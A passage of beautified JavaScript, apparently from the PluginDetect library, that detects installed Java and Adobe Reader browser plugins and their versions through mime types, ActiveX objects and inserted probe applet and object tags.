                        time: new Date().getTime(),
                        width: s.width,
                        obj: s.obj,
                        readyState: s.readyState,
                        objectProperty: s.objectProperty
                    };
                    if (n && n.parentNode) {
                        s.setStyle(p, s.defaultStyle.concat(["display", "inline"]).concat(o ? [] : ["fontSize", (s.pluginSize + 3) + "px", "lineHeight", (s.pluginSize + 3) + "px"]));
                        n.appendChild(p);
                        try {
                            p.innerHTML = v
                        } catch (r) {};
                        m.span = p;
                        m.winLoaded = f.win.loaded
                    }
                    return m
                }
            },
            file: {
                $: 1,
                any: "fileStorageAny999",
                valid: "fileStorageValid999",
                save: function (d, f, c) {
                    var b = this,
                        e = b.$,
                        a;
                    if (d && e.isDefined(c)) {
                        if (!d[b.any]) {
                            d[b.any] = []
                        }
                        if (!d[b.valid]) {
                            d[b.valid] = []
                        }
                        d[b.any].push(c);
                        a = b.split(f, c);
                        if (a) {
                            d[b.valid].push(a)
                        }
                    }
                },
                getValidLength: function (a) {
                    return a && a[this.valid] ? a[this.valid].length : 0
                },
                getAnyLength: function (a) {
                    return a && a[this.any] ? a[this.any].length : 0
                },
                getValid: function (c, a) {
                    var b = this;
                    return c && c[b.valid] ? b.get(c[b.valid], a) : null
                },
                getAny: function (c, a) {
                    var b = this;
                    return c && c[b.any] ? b.get(c[b.any], a) : null
                },
                get: function (d, a) {
                    var c = d.length - 1,
                        b = this.$.isNum(a) ? a : c;
                    return (b < 0 || b > c) ? null : d[b]
                },
                split: function (g, c) {
                    var b = this,
                        e = b.$,
                        f = null,
                        a, d;
                    g = g ? g.replace(".", "\\.") : "";
                    d = new RegExp("^(.*[^\\/])(" + g + "\\s*)$");
                    if (e.isString(c) && d.test(c)) {
                        a = (RegExp.$1).split("/");
                        f = {
                            name: a[a.length - 1],
                            ext: RegExp.$2,
                            full: c
                        };
                        a[a.length - 1] = "";
                        f.path = a.join("/")
                    }
                    return f
                },
                z: 0
            },
            Plugins: {
                java: {
                    $: 1,
                    mimeType: ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"],
                    mimeType_dummy: "application/dummymimejavaapplet",
                    classID: "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",
                    classID_dummy: "clsid:8AD9C840-044E-11D1-B3E9-BA9876543210",
                    navigator: {
                        $: 1,
                        a: (function () {
                            var b, a = !0;
                            try {
                                a = window.navigator.javaEnabled()
                            } catch (b) {}
                            return a
                        })(),
                        javaEnabled: function () {
                            return this.a
                        },
                        mimeObj: 0,
                        pluginObj: 0
                    },
                    OTF: null,
                    getVerifyTagsDefault: function () {
                        return [1, this.applet.isDisabled.VerifyTagsDefault_1() ? 0 : 1, 1]
                    },
                    getVersion: function (j, g, i) {
                        var b = this,
                            d = b.$,
                            e, a = b.applet,
                            h = b.verify,
                            k = b.navigator,
                            f = null,
                            l = null,
                            c = null;
                        if (b.getVersionDone === null) {
                            b.OTF = 0;
                            k.mimeObj = d.hasMimeType(b.mimeType);
                            if (k.mimeObj) {
                                k.pluginObj = k.mimeObj.enabledPlugin
                            }
                            if (h) {
                                h.begin()
                            }
                        }
                        a.setVerifyTagsArray(i);
                        d.file.save(b, ".jar", g);
                        if (b.getVersionDone === 0) {
                            if (a.should_Insert_Query_Any()) {
                                e = a.insert_Query_Any(j);
                                b.setPluginStatus(e[0], e[1], f, j)
                            }
                            return
                        }
                        if ((!f || d.dbug) && b.navMime.query().version) {
                            f = b.navMime.version
                        }
                        if ((!f || d.dbug) && b.DTK.query(d.dbug).version) {
                            f = b.DTK.version
                        }
                        if ((!f || d.dbug) && b.navPlugin.query().version) {
                            f = b.navPlugin.version
                        }
                        if (b.nonAppletDetectionOk(f)) {
                            c = f
                        }
                        b.setPluginStatus(c, l, f, j);
                        if (a.should_Insert_Query_Any()) {
                            e = a.insert_Query_Any(j);
                            if (e[0]) {
                                c = e[0];
                                l = e[1]
                            }
                        }
                        b.setPluginStatus(c, l, f, j)
                    },
                    nonAppletDetectionOk: function (b) {
                        var d = this,
                            e = d.$,
                            a = d.navigator,
                            c = 1;
                        if (!b || !a.javaEnabled() || (!e.isIE && !a.mimeObj) || (e.isIE && !e.ActiveXEnabled)) {
                            c = 0
                        } else {
                            if (e.OS >= 20) {} else {
                                if (d.info && d.info.getPlugin2Status() < 0 && d.info.BrowserRequiresPlugin2()) {
                                    c = 0
                                }
                            }
                        }
                        return c
                    },
                    setPluginStatus: function (d, i, g, h) {
                        var b = this,
                            e = b.$,
                            f, c = 0,
                            a = b.applet;
                        g = g || b.version0;
                        f = a.isRange(d);
                        if (f) {
                            if (a.setRange(f, h) == d) {
                                c = f
                            }
                            d = 0
                        }
                        if (b.OTF < 3) {
                            b.installed = c ? (c > 0 ? 0.7 : -0.1) : (d ? 1 : (g ? -0.2 : -1))
                        }
                        if (b.OTF == 2 && b.NOTF && !b.applet.getResult()[0]) {
                            b.installed = g ? -0.2 : -1
                        }
                        if (b.OTF == 3 && b.installed != -0.5 && b.installed != 0.5) {
                            b.installed = (b.NOTF.isJavaActive(1) == 1 ? 0.5 : -0.5)
                        }
                        if (b.OTF == 4 && (b.installed == -0.5 || b.installed == 0.5)) {
                            if (d) {
                                b.installed = 1
                            } else {
                                if (c) {
                                    b.installed = c > 0 ? 0.7 : -0.1
                                } else {
                                    if (b.NOTF.isJavaActive(1) == 1) {
                                        if (g) {
                                            b.installed = 1;
                                            d = g
                                        } else {
                                            b.installed = 0
                                        }
                                    } else {
                                        if (g) {
                                            b.installed = -0.2
                                        } else {
                                            b.installed = -1
                                        }
                                    }
                                }
                            }
                        }
                        if (g) {
                            b.version0 = e.formatNum(e.getNum(g))
                        }
                        if (d && !c) {
                            b.version = e.formatNum(e.getNum(d))
                        }
                        if (i && e.isString(i)) {
                            b.vendor = i
                        }
                        if (!b.vendor) {
                            b.vendor = ""
                        }
                        if (b.verify && b.verify.isEnabled()) {
                            b.getVersionDone = 0
                        } else {
                            if (b.getVersionDone != 1) {
                                if (b.OTF < 2) {
                                    b.getVersionDone = 0
                                } else {
                                    b.getVersionDone = b.applet.can_Insert_Query_Any() ? 0 : 1
                                }
                            }
                        };
                        e.codebase.emptyGarbage()
                    },
                    DTK: {
                        $: 1,
                        hasRun: 0,
                        status: null,
                        VERSIONS: [],
                        version: "",
                        HTML: null,
                        Plugin2Status: null,
                        classID: ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],
                        mimeType: ["application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"],
                        isDisabled: function (a) {
                            var b = this,
                                c = b.$;
                            if (!a && (!c.DOM.isEnabled.objectTag() || (c.isIE && c.verIE < 6) || (c.isGecko && c.compareNums(c.verGecko, c.formatNum("1.6")) <= 0) || (c.isSafari && c.OS == 1 && (!c.verSafari || c.compareNums(c.verSafari, "5,1,0,0") < 0)) || c.isChrome)) {
                                return 1
                            }
                            return 0
                        },
                        query: function (n) {
                            var l = this,
                                h = l.$,
                                f = l.$$,
                                k, m, i, a = h.DOM.altHTML,
                                g = {}, b, d = null,
                                j = null,
                                c = (l.hasRun || l.isDisabled(n));
                            l.hasRun = 1;
                            if (c) {
                                return l
                            }
                            l.status = 0;
                            if (h.isIE) {
                                for (m = 0; m < l.classID.length; m++) {
                                    l.HTML = h.DOM.insert("object", ["classid", l.classID[m]], [], a);
                                    d = l.HTML.obj();
                                    if (h.getPROP(d, "jvms")) {
                                        break
                                    }
                                }
                            } else {
                                i = h.hasMimeType(l.mimeType);
                                if (i && i.type) {
                                    l.HTML = h.DOM.insert("object", ["type", i.type], [], a);
                                    d = l.HTML.obj()
                                }
                            } if (d) {
                                try {
                                    b = h.getPROP(d, "jvms");
                                    if (b) {
                                        j = b.getLength();
                                        if (h.isNum(j)) {
                                            l.status = j > 0 ? 1 : -1;
                                            for (m = 0; m < j; m++) {
                                                i = h.getNum(b.get(j - 1 - m).version);
                                                if (i) {
                                                    l.VERSIONS.push(i);
                                                    g["a" + h.formatNum(i)] = 1
                                                }
                                            }
                                        }
                                    }
                                } catch (k) {}
                            }
                            i = 0;
                            for (m in g) {
                                i++
                            }
                            if (i && i !== l.VERSIONS.length) {
                                l.VERSIONS = []
                            }
                            if (l.VERSIONS.length) {
                                l.version = h.formatNum(l.VERSIONS[0])
                            };
                            return l
                        }
                    },
                    navMime: {
                        $: 1,
                        hasRun: 0,
                        mimetype: "",
                        version: "",
                        length: 0,
                        mimeObj: 0,
                        pluginObj: 0,
                        isDisabled: function () {
                            var b = this,
                                d = b.$,
                                c = b.$$,
                                a = c.navigator;
                            if (d.isIE || !a.mimeObj || !a.pluginObj) {
                                return 1
                            }
                            return 0
                        },
                        query: function () {
                            var i = this,
                                f = i.$,
                                a = i.$$,
                                b = (i.hasRun || i.isDisabled());
                            i.hasRun = 1;
                            if (b) {
                                return i
                            };
                            var n = /^\s*application\/x-java-applet;jpi-version\s*=\s*(\d.*)$/i,
                                g, l, j, d = "",
                                h = "a",
                                o, m, k = {}, c = f.formatNum("0");
                            for (l = 0; l < navigator.mimeTypes.length; l++) {
                                o = navigator.mimeTypes[l];
                                m = o ? o.enabledPlugin : 0;
                                g = o && n.test(o.type || d) ? f.formatNum(f.getNum(RegExp.$1)) : 0;
                                if (g && m && (m.description || m.name)) {
                                    if (!k[h + g]) {
                                        i.length++
                                    }
                                    k[h + g] = o.type;
                                    if (f.compareNums(g, c) > 0) {
                                        c = g
                                    }
                                }
                            }
                            g = k[h + c];
                            if (g) {
                                o = f.hasMimeType(g);
                                i.mimeObj = o;
                                i.pluginObj = o ? o.enabledPlugin : 0;
                                i.mimetype = g;
                                i.version = c
                            };
                            return i
                        }
                    },
                    navPlugin: {
                        $: 1,
                        hasRun: 0,
                        version: "",
                        isDisabled: function () {
                            var d = this,
                                c = d.$,
                                b = d.$$,
                                a = b.navigator;
                            if (c.isIE || !a.mimeObj || !a.pluginObj) {
                                return 1
                            }
                            return 0
                        },
                        query: function () {
                            var m = this,
                                e = m.$,
                                c = m.$$,
                                h = c.navigator,
                                j, l, k, g, d, a, i, f = 0,
                                b = (m.hasRun || m.isDisabled());
                            m.hasRun = 1;
                            if (b) {
                                return m
                            };
                            a = h.pluginObj.name || "";
                            i = h.pluginObj.description || "";
                            if (!f || e.dbug) {
                                g = /Java.*TM.*Platform[^\d]*(\d+)(?:[\.,_](\d*))?(?:\s*[Update]+\s*(\d*))?/i;
                                if ((g.test(a) || g.test(i)) && parseInt(RegExp.$1, 10) >= 5) {
                                    f = "1," + RegExp.$1 + "," + (RegExp.$2 ? RegExp.$2 : "0") + "," + (RegExp.$3 ? RegExp.$3 : "0")
                                }
                            }
                            if (!f || e.dbug) {
                                g = /Java[^\d]*Plug-in/i;
                                l = g.test(i) ? e.formatNum(e.getNum(i)) : 0;
                                k = g.test(a) ? e.formatNum(e.getNum(a)) : 0;
                                if (l && (e.compareNums(l, e.formatNum("1,3")) < 0 || e.compareNums(l, e.formatNum("2")) >= 0)) {
                                    l = 0
                                }
                                if (k && (e.compareNums(k, e.formatNum("1,3")) < 0 || e.compareNums(k, e.formatNum("2")) >= 0)) {
                                    k = 0
                                }
                                d = l && k ? (e.compareNums(l, k) > 0 ? l : k) : (l || k);
                                if (d) {
                                    f = d
                                }
                            }
                            if (!f && e.isSafari && e.OS == 2) {
                                j = e.findNavPlugin("Java.*\\d.*Plug-in.*Cocoa", 0);
                                if (j) {
                                    l = e.getNum(j.description);
                                    if (l) {
                                        f = l
                                    }
                                }
                            };
                            if (f) {
                                m.version = e.formatNum(f)
                            };
                            return m
                        }
                    },
                    applet: {
                        $: 1,
                        codebase: {
                            $: 1,
                            isMin: function (a) {
                                return this.$.codebase.isMin(this, a)
                            },
                            search: function () {
                                return this.$.codebase.search(this)
                            },
                            ParamTags: '<param name="code" value="A19999.class" /><param name="codebase_lookup" value="false" />',
                            DIGITMAX: [
                                [16, 64],
                                [6, 0, 512], 0, [1, 5, 2, 256], 0, [1, 4, 1, 1],
                                [1, 4, 0, 64],
                                [1, 3, 2, 32]
                            ],
                            DIGITMIN: [1, 0, 0, 0],
                            Upper: ["999", "10", "5,0,20", "1,5,0,20", "1,4,1,20", "1,4,1,2", "1,4,1", "1,4"],
                            Lower: ["10", "5,0,20", "1,5,0,20", "1,4,1,20", "1,4,1,2", "1,4,1", "1,4", "0"],
                            convert: [
                                function (b, a) {
                                    return a ? [parseInt(b[0], 10) > 1 ? "99" : parseInt(b[1], 10) + 3 + "", b[3], "0", "0"] : ["1", parseInt(b[0], 10) - 3 + "", "0", b[1]]
                                },
                                function (b, a) {
                                    return a ? [b[1], b[2], b[3] + "0", "0"] : ["1", b[0], b[1], b[2].substring(0, b[2].length - 1 || 1)]
                                },
                                0,
                                function (b, a) {
                                    return a ? [b[0], b[1], b[2], b[3] + "0"] : [b[0], b[1], b[2], b[3].substring(0, b[3].length - 1 || 1)]
                                },
                                0, 1,
                                function (b, a) {
                                    return a ? [b[0], b[1], b[2], b[3] + "0"] : [b[0], b[1], b[2], b[3].substring(0, b[3].length - 1 || 1)]
                                },
                                1
                            ]
                        },
                        results: [
                            [null, null],
                            [null, null],
                            [null, null],
                            [null, null]
                        ],
                        getResult: function () {
                            var b = this,
                                d = b.results,
                                a, c = [];
                            for (a = d.length - 1; a >= 0; a--) {
                                c = d[a];
                                if (c[0]) {
                                    break
                                }
                            }
                            c = [].concat(c);
                            return c
                        },
                        DummySpanTagHTML: 0,
                        HTML: [0, 0, 0, 0],
                        active: [0, 0, 0, 0],
                        DummyObjTagHTML: 0,
                        DummyObjTagHTML2: 0,
                        allowed: [1, 1, 1, 1],
                        VerifyTagsHas: function (c) {
                            var d = this,
                                b;
                            for (b = 0; b < d.allowed.length; b++) {
                                if (d.allowed[b] === c) {
                                    return 1
                                }
                            }
                            return 0
                        },
                        saveAsVerifyTagsArray: function (c) {
                            var b = this,
                                d = b.$,
                                a;
                            if (d.isArray(c)) {
                                for (a = 1; a < b.allowed.length; a++) {
                                    if (c.length > a - 1 && d.isNum(c[a - 1])) {
                                        if (c[a - 1] < 0) {
                                            c[a - 1] = 0
                                        }
                                        if (c[a - 1] > 3) {
                                            c[a - 1] = 3
                                        }
                                        b.allowed[a] = c[a - 1]
                                    }
                                }
                                b.allowed[0] = b.allowed[3]
                            }
                        },
                        setVerifyTagsArray: function (d) {
                            var b = this,
                                c = b.$,
                                a = b.$$;
                            if (a.getVersionDone === null) {
                                b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())
                            }
                            if (c.dbug) {
                                b.saveAsVerifyTagsArray([3, 3, 3])
                            } else {
                                if (d) {
                                    b.saveAsVerifyTagsArray(d)
                                }
                            }
                        },
                        isDisabled: {
                            $: 1,
                            single: function (d) {
                                var a = this,
                                    c = a.$,
                                    b = a.$$;
                                if (d == 0) {
                                    return c.codebase.isDisabled()
                                }
                                if ((d == 3 && !c.isIE) || a.all()) {
                                    return 1
                                }
                                if (d == 1 || d == 3) {
                                    return !c.DOM.isEnabled.objectTag()
                                }
                                if (d == 2) {
                                    return a.AppletTag()
                                }
                            },
                            aA_: null,
                            all: function () {
                                var c = this,
                                    e = c.$,
                                    d = c.$$,
                                    b = d.navigator,
                                    a = 0;
                                if (c.aA_ === null) {
                                    if (e.OS >= 20) {
                                        a = 0
                                    } else {
                                        if (e.verOpera && e.verOpera < 11 && !b.javaEnabled()) {
                                            a = 1
                                        } else {
                                            if ((e.verGecko && e.compareNums(e.verGecko, e.formatNum("2")) < 0) && !b.mimeObj) {
                                                a = 1
                                            } else {
                                                if (c.AppletTag() && !e.DOM.isEnabled.objectTag()) {
                                                    a = 1
                                                }
                                            }
                                        }
                                    };
                                    c.aA_ = a
                                }
                                return c.aA_
                            },
                            AppletTag: function () {
                                var b = this,
                                    d = b.$,
                                    c = b.$$,
                                    a = c.navigator;
                                return d.isIE ? !a.javaEnabled() : 0
                            },
                            VerifyTagsDefault_1: function () {
                                var a = this.$;
                                if (a.OS >= 20) {
                                    return 1
                                }
                                if ((a.isIE && (a.verIE < 9 || !a.ActiveXEnabled)) || (a.verGecko && a.compareNums(a.verGecko, a.formatNum("2")) < 0) || (a.isSafari && (!a.verSafari || a.compareNums(a.verSafari, a.formatNum("4")) < 0)) || (a.verOpera && a.verOpera < 10)) {
                                    return 0
                                }
                                return 1
                            },
                            z: 0
                        },
                        can_Insert_Query: function (d) {
                            var b = this,
                                c = b.results[0][0],
                                a = b.getResult()[0];
                            if (b.HTML[d] || (d == 0 && c !== null && !b.isRange(c)) || (d == 0 && a && !b.isRange(a))) {
                                return 0
                            }
                            return !b.isDisabled.single(d)
                        },
                        can_Insert_Query_Any: function () {
                            var b = this,
                                a;
                            for (a = 0; a < b.results.length; a++) {
                                if (b.can_Insert_Query(a)) {
                                    return 1
                                }
                            }
                            return 0
                        },
                        should_Insert_Query: function (e) {
                            var c = this,
                                f = c.allowed,
                                d = c.$,
                                b = c.$$,
                                a = c.getResult()[0];
                            a = a && (e > 0 || !c.isRange(a));
                            if (!c.can_Insert_Query(e) || f[e] === 0) {
                                return 0
                            }
                            if (f[e] == 3 || (f[e] == 2.8 && !a)) {
                                return 1
                            }
                            if (!b.nonAppletDetectionOk(b.version0)) {
                                if (f[e] == 2 || (f[e] == 1 && !a)) {
                                    return 1
                                }
                            }
                            return 0
                        },
                        should_Insert_Query_Any: function () {
                            var b = this,
                                a;
                            for (a = 0; a < b.allowed.length; a++) {
                                if (b.should_Insert_Query(a)) {
                                    return 1
                                }
                            }
                            return 0
                        },
                        query: function (f) {
                            var j, a = this,
                                i = a.$,
                                d = a.$$,
                                k = null,
                                l = null,
                                b = a.results,
                                c, h, g = a.HTML[f];
                            if (!g || !g.obj() || b[f][0] || d.bridgeDisabled || (i.dbug && d.OTF < 3)) {
                                return
                            }
                            c = g.obj();
                            h = g.readyState();
                            if (!i.isIE || h === 4) {
                                try {
                                    k = i.getNum(c.getVersion() + "");
                                    l = c.getVendor() + "";
                                    c.statusbar(i.win.loaded ? " " : " ")
                                } catch (j) {};
                                if (k && i.isStrNum(k)) {
                                    b[f] = [k, l];
                                    a.active[f] = 2
                                }
                            }
                        },
                        isRange: function (a) {
                            return (/^[<>]/).test(a || "") ? (a.charAt(0) == ">" ? 1 : -1) : 0
                        },
                        setRange: function (b, a) {
                            return (b ? (b > 0 ? ">" : "<") : "") + (this.$.isString(a) ? a : "")
                        },
                        insertJavaTag: function (g, n, h, o, m) {
                            var e = this,
                                c = e.$,
                                k = e.$$,
                                r = "A.class",
                                b = c.file.getValid(k),
                                f = b.name + b.ext,
                                q = b.path;
                            var i = ["archive", f, "code", r],
                                l = (o ? ["width", o] : []).concat(m ? ["height", m] : []),
                                j = ["mayscript", "true"],
                                p = ["scriptable", "true", "codebase_lookup", "false"].concat(j),
                                a = k.navigator,
                                d = !c.isIE && a.mimeObj && a.mimeObj.type ? a.mimeObj.type : k.mimeType[0];
                            if (g == 1) {
                                return c.isIE ? c.DOM.insert("object", ["type", d].concat(l), ["codebase", q].concat(i).concat(p), h, k, 0, n) : c.DOM.insert("object", ["type", d].concat(l), ["codebase", q].concat(i).concat(p), h, k, 0, n)
                            }
                            if (g == 2) {
                                return c.isIE ? c.DOM.insert("applet", ["alt", h].concat(j).concat(i).concat(l), ["codebase", q].concat(p), h, k, 0, n) : c.DOM.insert("applet", ["codebase", q, "alt", h].concat(j).concat(i).concat(l), [].concat(p), h, k, 0, n)
                            }
                            if (g == 3) {
                                return c.isIE ? c.DOM.insert("object", ["classid", k.classID].concat(l), ["codebase", q].concat(i).concat(p), h, k, 0, n) : c.DOM.insert()
                            }
                            if (g == 4) {
                                return c.DOM.insert("embed", ["codebase", q].concat(i).concat(["type", d]).concat(p).concat(l), [], h, k, 0, n)
                            }
                        },
                        insert_Query_Any: function (i) {
                            var b = this,
                                d = b.$,
                                c = b.$$,
                                g = b.results,
                                j = b.HTML,
                                a = d.DOM.altHTML,
                                e, h = d.file.getValid(c);
                            if (b.should_Insert_Query(0)) {
                                if (c.OTF < 2) {
                                    c.OTF = 2
                                };
                                g[0] = [0, 0];
                                e = i ? b.codebase.isMin(i) : b.codebase.search();
                                if (e) {
                                    g[0][0] = i ? b.setRange(e, i) : e
                                }
                                b.active[0] = e ? 1.5 : -1
                            }
                            if (!h) {
                                return b.getResult()
                            }
                            if (!b.DummySpanTagHTML) {
                                b.DummySpanTagHTML = d.DOM.insert("", [], [], a)
                            }
                            if (b.should_Insert_Query(1)) {
                                if (c.OTF < 2) {
                                    c.OTF = 2
                                };
                                j[1] = b.insertJavaTag(1, 0, a);
                                g[1] = [0, 0];
                                b.query(1)
                            }
                            if (b.should_Insert_Query(2)) {
                                if (c.OTF < 2) {
                                    c.OTF = 2
                                };
                                j[2] = b.insertJavaTag(2, 0, a);
                                g[2] = [0, 0];
                                b.query(2)
                            }
                            if (b.should_Insert_Query(3)) {
                                if (c.OTF < 2) {
                                    c.OTF = 2
                                };
                                j[3] = b.insertJavaTag(3, 0, a);
                                g[3] = [0, 0];
                                b.query(3)
                            }
                            if (d.DOM.isEnabled.objectTag()) {
                                if (!b.DummyObjTagHTML && (j[1] || j[2])) {
                                    b.DummyObjTagHTML = d.DOM.insert("object", ["type", c.mimeType_dummy], [], a)
                                }
                                if (!b.DummyObjTagHTML2 && j[3]) {
                                    b.DummyObjTagHTML2 = d.DOM.insert("object", ["classid", c.classID_dummy], [], a)
                                }
                            }
                            var f = c.NOTF;
                            if (c.OTF < 3 && f.shouldContinueQuery()) {
                                c.OTF = 3;
                                f.onIntervalQuery = d.ev.handler(f.$$onIntervalQuery, f);
                                if (!d.win.loaded) {
                                    d.win.funcs0.push([f.winOnLoadQuery, f])
                                }
                                setTimeout(f.onIntervalQuery, f.intervalLength)
                            }
                            return b.getResult()
                        }
                    },
                    NOTF: {
                        $: 1,
                        count: 0,
                        countMax: 25,
                        intervalLength: 250,
                        shouldContinueQuery: function () {
                            var f = this,
                                e = f.$,
                                c = f.$$,
                                b = c.applet,
                                a, d = 0;
                            if (e.win.loaded && f.count > f.countMax) {
                                return 0
                            }
                            for (a = 0; a < b.results.length; a++) {
                                if (b.HTML[a]) {
                                    if (!e.win.loaded && f.count > f.countMax && e.codebase.checkGarbage(b.HTML[a].span)) {
                                        d = 1;
                                        b.HTML[a].DELETE = 1
                                    }
                                    if (!d && !b.results[a][0] && (b.allowed[a] >= 2 || (b.allowed[a] == 1 && !b.getResult()[0])) && f.isAppletActive(a) >= 0) {
                                        return 1
                                    }
                                }
                            };
                            return 0
                        },
                        isJavaActive: function (d) {
                            var f = this,
                                c = f.$$,
                                a, b, e = -9;
                            for (a = 0; a < c.applet.HTML.length; a++) {
                                b = f.isAppletActive(a, d);
                                if (b > e) {
                                    e = b
                                }
                            }
                            return e
                        },
                        isAppletActive: function (e, g) {
                            var h = this,
                                f = h.$,
                                b = h.$$,
                                l = b.navigator,
                                a = b.applet,
                                i = a.HTML[e],
                                d = a.active,
                                k, c = 0,
                                j, m = d[e];
                            if (g || m >= 1.5 || !i || !i.span) {
                                return m
                            };
                            j = f.DOM.getTagStatus(i, a.DummySpanTagHTML, a.DummyObjTagHTML, a.DummyObjTagHTML2, h.count);
                            for (k = 0; k < d.length; k++) {
                                if (d[k] > 0) {
                                    c = 1
                                }
                            }
                            if (j != 1) {
                                m = j
                            } else {
                                if (f.isIE || (b.version0 && l.javaEnabled() && l.mimeObj && (i.tagName == "object" || c))) {
                                    m = 1
                                } else {
                                    m = 0
                                }
                            }
                            d[e] = m;
                            return m
                        },
                        winOnLoadQuery: function (c, d) {
                            var b = d.$$,
                                a;
                            if (b.OTF == 3) {
                                a = d.queryAllApplets();
                                d.queryCompleted(a)
                            }
                        },
                        $$onIntervalQuery: function (d) {
                            var c = d.$,
                                b = d.$$,
                                a;
                            if (b.OTF == 3) {
                                a = d.queryAllApplets();
                                if (!d.shouldContinueQuery()) {
                                    d.queryCompleted(a)
                                }
                            }
                            d.count++;
                            if (b.OTF == 3) {
                                setTimeout(d.onIntervalQuery, d.intervalLength)
                            }
                        },
                        queryAllApplets: function () {
                            var f = this,
                                e = f.$,
                                d = f.$$,
                                c = d.applet,
                                b, a;
                            for (b = 0; b < c.results.length; b++) {
                                c.query(b)
                            }
                            a = c.getResult();
                            return a
                        },
                        queryCompleted: function (c) {
                            var g = this,
                                f = g.$,
                                e = g.$$,
                                d = e.applet,
                                b;
                            if (e.OTF >= 4) {
                                return
                            }
                            e.OTF = 4;
                            var a = g.isJavaActive();
                            for (b = 0; b < d.HTML.length; b++) {
                                if (d.HTML[b] && d.HTML[b].DELETE) {
                                    f.DOM.emptyNode(d.HTML[b].span);
                                    d.HTML[b].span = null
                                }
                            }
                            e.setPluginStatus(c[0], c[1], 0);
                            if (f.onDetectionDone && e.funcs) {
                                f.ev.callArray(e.funcs)
                            }
                            if (f.DOM) {
                                f.DOM.onDoneEmptyDiv()
                            }
                        }
                    },
                    zz: 0
                },
                adobereader: {
                    $: 1,
                    setPluginStatus: function () {
                        var d = this,
                            b = d.$,
                            a = d.navPlugin.detected,
                            e = d.navPlugin.version,
                            g = d.axo.detected,
                            c = d.axo.version,
                            i = d.doc.detected,
                            h = d.doc.version,
                            f = e || c || h || null;
                        d.installed = f ? 1 : (a > 0 || g > 0 || i > 0 ? 0 : (i == -0.5 ? -0.15 : (b.isIE && (!b.ActiveXEnabled || b.ActiveXFilteringEnabled) ? -1.5 : -1)));
                        d.version = b.formatNum(f)
                    },
                    getVersion: function (c, e) {
                        var a = this,
                            d = a.$,
                            b = 0;
                        if ((!b || d.dbug) && a.navPlugin.query().detected > 0) {
                            b = 1
                        }
                        if ((!b || d.dbug) && a.axo.query().detected > 0) {
                            b = 1
                        }
                        if ((!b || d.dbug) && (a.doc.query().detected > 0 || a.doc.detected == -0.5)) {
                            b = 1
                        }
                        a.setPluginStatus()
                    },
                    navPlugin: {
                        $: 1,
                        detected: 0,
                        version: null,
                        mimeType: "application/pdf",
                        isDisabled: function () {
                            var c = this,
                                b = c.$,
                                a = c.$$;
                            return b.isIE || c.detected || !b.hasMimeType(c.mimeType) ? 1 : 0
                        },
                        attempt3: function () {
                            var c = this,
                                b = c.$,
                                a = null;
                            if (b.OS == 1) {
                                if (b.hasMimeType("application/vnd.adobe.pdfxml")) {
                                    a = "9"
                                } else {
                                    if (b.hasMimeType("application/vnd.adobe.x-mars")) {
                                        a = "8"
                                    } else {
                                        if (b.hasMimeType("application/vnd.adobe.xfdf")) {
                                            a = "6"
                                        }
                                    }
                                }
                            }
                            return a
                        },
                        query: function () {
                            var d = this,
                                c = d.$,
                                a = d.$$,
                                f, e, b = null;
                            if (d.isDisabled()) {
                                return d
                            };
                            f = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
                            e = c.findNavPlugin(f, 0);
                            d.detected = e ? 1 : -1;
                            if (e) {
                                b = c.getNum(e.description) || c.getNum(e.name);
                                b = c.getPluginFileVersion(e, b);
                                if (!b) {
                                    b = d.attempt3()
                                }
                            }
                            if (b) {
                                d.version = b
                            };
                            return d
                        }
                    },
                    pluginQuery: function (j) {
                        var f = this,
                            d = f.$,
                            b = "",
                            h = null,
                            g, a, i, c;
                        try {
                            if (j) {
                                b = j.GetVersions()
                            }
                        } catch (g) {}
                        if (b && d.isString(b)) {
                            a = /=\s*([\d\.]+)/g;
                            for (i = 0; i < 30; i++) {
                                if (a.test(b)) {
                                    c = d.formatNum(RegExp.$1);
                                    if (!h || d.compareNums(c > h) > 0) {
                                        h = c
                                    }
                                } else {
                                    break
                                }
                            }
                        }
                        return h
                    },
                    axo: {
                        $: 1,
                        detected: 0,
                        version: null,
                        progID: ["AcroPDF.PDF", "AcroPDF.PDF.1", "PDF.PdfCtrl", "PDF.PdfCtrl.5", "PDF.PdfCtrl.1"],
                        isDisabled: function () {
                            var b = this,
                                c = b.$,
                                a = b.$$;
                            return c.isIE && !b.detected ? 0 : 1
                        },
                        query: function () {
                            var d = this,
                                e = d.$,
                                b = d.$$,
                                f = 0,
                                c = null,
                                a;
                            if (d.isDisabled()) {
                                return d
                            };
                            for (a = 0; a < d.progID.length; a++) {
                                f = e.getAXO(d.progID[a]);
                                if (f) {
                                    d.detected = 1;
                                    c = b.pluginQuery(f);
                                    if (!e.dbug && c) {
                                        break
                                    }
                                }
                            }
                            d.version = c ? c : null;
                            if (d.detected === 0) {
                                d.detected = -1
                            };
                            return d
                        }
                    },
                    doc: {
                        $: 1,
                        detected: 0,
                        version: null,
                        classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
                        classID_dummy: "clsid:CA8A9780-280D-11CF-A24D-BA9876543210",
                        DummySpanTagHTML: 0,
                        HTML: 0,
                        DummyObjTagHTML1: 0,
                        DummyObjTagHTML2: 0,
                        isDisabled: function () {
                            var c = this,
                                b = c.$,
                                a = 0;
                            if (c.detected) {
                                a = 1
                            } else {
                                if (b.dbug) {} else {
                                    if (!b.isIE || !b.DOM.isEnabled.objectTag()) {
                                        a = 1
                                    }
                                }
                            }
                            return a
                        },
                        query: function () {
                            var i = this,
                                d = i.$,
                                f = i.$$,
                                h = null,
                                a = d.DOM.altHTML,
                                g = null,
                                c = 1,
                                e = 1,
                                b;
                            if (i.isDisabled()) {
                                return i
                            };
                            if (!i.DummySpanTagHTML) {
                                i.DummySpanTagHTML = d.DOM.insert("", [], [], a, f, e)
                            }
                            if (!i.HTML) {
                                i.HTML = d.DOM.insert("object", ["classid", i.classID], [], a, f, e)
                            }
                            if (!i.DummyObjTagHTML2) {
                                i.DummyObjTagHTML2 = d.DOM.insert("object", ["classid", i.classID_dummy], [], a, f, e)
                            }
